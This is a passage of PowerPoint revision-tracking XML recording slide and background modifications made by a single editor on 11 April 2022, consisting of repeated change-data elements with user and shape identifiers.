        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1465048625" sldId="723"/>
            <ac:spMk id="3" creationId="{662314F4-5663-4E3E-BEC4-E0672B227A02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1465048625" sldId="723"/>
            <ac:spMk id="5" creationId="{C612229C-8C2E-4620-881A-3A4DF9E30591}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4255792903" sldId="724"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4255792903" sldId="724"/>
            <ac:spMk id="2" creationId="{8CDEAAED-D2BF-438F-8DCB-F5D3C92EC10D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4255792903" sldId="724"/>
            <ac:spMk id="3" creationId="{782FDFD6-9BCF-4465-878D-B64DD7FD9EEC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3021848000" sldId="725"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3021848000" sldId="725"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="627147708" sldId="726"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="627147708" sldId="726"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="627147708" sldId="726"/>
            <ac:spMk id="5" creationId="{6DB0D3B1-F5AC-4D52-B425-613C9C48B4F5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1585866184" sldId="773"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1965837497" sldId="774"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2032874784" sldId="775"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2032874784" sldId="775"/>
            <ac:spMk id="7" creationId="{407A7D86-6E99-46D6-B930-1970EEF1E471}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2032874784" sldId="775"/>
            <ac:spMk id="8" creationId="{BD0DD42B-6D0E-4A26-9FAF-4C3BA19C1FF6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4136873321" sldId="776"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4136873321" sldId="776"/>
            <ac:spMk id="2" creationId="{D3D763B2-30E7-4D6D-9EC1-92C97652A57B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:29:40.842" v="0" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4136873321" sldId="776"/>
            <ac:spMk id="4" creationId="{031AB835-69AA-4C05-896B-1A714D2C2FD7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3771173899" sldId="777"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771173899" sldId="777"/>
            <ac:spMk id="3" creationId="{FD8B8001-CD78-6846-91F1-30431D512F70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771173899" sldId="777"/>
            <ac:spMk id="4" creationId="{F0F957D6-27C0-6E42-8C05-8D1320AD1BDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2931553474" sldId="778"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2931553474" sldId="778"/>
            <ac:spMk id="2" creationId="{DF6627F1-F08F-4F09-BFE9-C3E9055CB355}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2931553474" sldId="778"/>
            <ac:spMk id="3" creationId="{B2BF2284-5148-4E1E-8541-5286DFBB0D85}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="315069026" sldId="779"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="315069026" sldId="779"/>
            <ac:spMk id="2" creationId="{9D27A166-21AE-474B-BBDF-4EE98C6C4916}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="315069026" sldId="779"/>
            <ac:spMk id="3" creationId="{04F5BD7F-36AB-4DF4-BDCE-ECA7C0ABFE84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="315069026" sldId="779"/>
            <ac:spMk id="4" creationId="{C9261E33-F169-4EAC-AA61-21D90DFBF89D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1841892492" sldId="780"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1841892492" sldId="780"/>
            <ac:spMk id="2" creationId="{AF883723-2991-4907-BD6A-B081164F707B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1841892492" sldId="780"/>
            <ac:spMk id="3" creationId="{E696A254-5643-4F02-975B-4748176BD058}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3686708551" sldId="781"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3686708551" sldId="781"/>
            <ac:spMk id="2" creationId="{B49E85D0-AD62-4727-A44F-E06E99A055C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3686708551" sldId="781"/>
            <ac:spMk id="3" creationId="{1E70BDDB-A019-4D5B-BF0F-39E9BE3A0A90}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="53198382" sldId="782"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="53198382" sldId="782"/>
            <ac:spMk id="2" creationId="{B74EDC2F-E5CF-496A-89AE-29839997842E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="53198382" sldId="782"/>
            <ac:spMk id="3" creationId="{6101EF23-8BCF-4F05-B88E-220A02669128}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3759134125" sldId="783"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3759134125" sldId="783"/>
            <ac:spMk id="2" creationId="{D8E9A5F0-18B4-4153-B1A2-2E9979E8C16D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3759134125" sldId="783"/>
            <ac:spMk id="3" creationId="{B28ADA1B-9C4E-4A7C-AFD7-D76D1B9E5778}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2287680300" sldId="784"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2287680300" sldId="784"/>
            <ac:spMk id="2" creationId="{C3D78FD2-DAB9-487E-A9CE-1E6F8DD69E4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2287680300" sldId="784"/>
            <ac:spMk id="3" creationId="{F4E6A5A6-31A3-4801-85D3-9F1D6A8ECE63}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4204843083" sldId="785"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204843083" sldId="785"/>
            <ac:spMk id="2" creationId="{54931F35-38EB-499B-A4DC-90F0243050CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4204843083" sldId="785"/>
            <ac:spMk id="6" creationId="{00572A19-9542-43A6-A858-4ACF07943E5C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2608971127" sldId="786"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2608971127" sldId="786"/>
            <ac:spMk id="2" creationId="{5CF7A42A-2C94-4266-B6AC-5832EB10BC87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2608971127" sldId="786"/>
            <ac:spMk id="3" creationId="{23009BE4-D91B-4CAD-A074-4A73FEC240EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2608971127" sldId="786"/>
            <ac:spMk id="4" creationId="{C70529AE-3122-4573-A5B9-A911284F2F2A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3302140062" sldId="787"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302140062" sldId="787"/>
            <ac:spMk id="2" creationId="{CEF80F08-93B9-435E-BF15-A9EF42B524DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302140062" sldId="787"/>
            <ac:spMk id="3" creationId="{4774E3E1-8169-46FE-84DA-1889D0CCF954}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302140062" sldId="787"/>
            <ac:spMk id="4" creationId="{1181BADA-50F4-4BED-81C7-33E15666EBD3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="845206234" sldId="788"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="845206234" sldId="788"/>
            <ac:spMk id="2" creationId="{5F48B8E4-5EB5-47EE-BF21-E5A6317E0C3D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="845206234" sldId="788"/>
            <ac:spMk id="3" creationId="{55A6D5EF-66DD-4C28-A5A6-F164D8A311A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="845206234" sldId="788"/>
            <ac:spMk id="4" creationId="{51546644-5180-49BB-92FC-FBB1184AA25B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1097768443" sldId="789"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1097768443" sldId="789"/>
            <ac:spMk id="2" creationId="{B90A0CD6-938D-48FA-B700-88D60ADA5280}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1097768443" sldId="789"/>
            <ac:spMk id="3" creationId="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="507710925" sldId="790"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="507710925" sldId="790"/>
            <ac:spMk id="2" creationId="{B90A0CD6-938D-48FA-B700-88D60ADA5280}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="507710925" sldId="790"/>
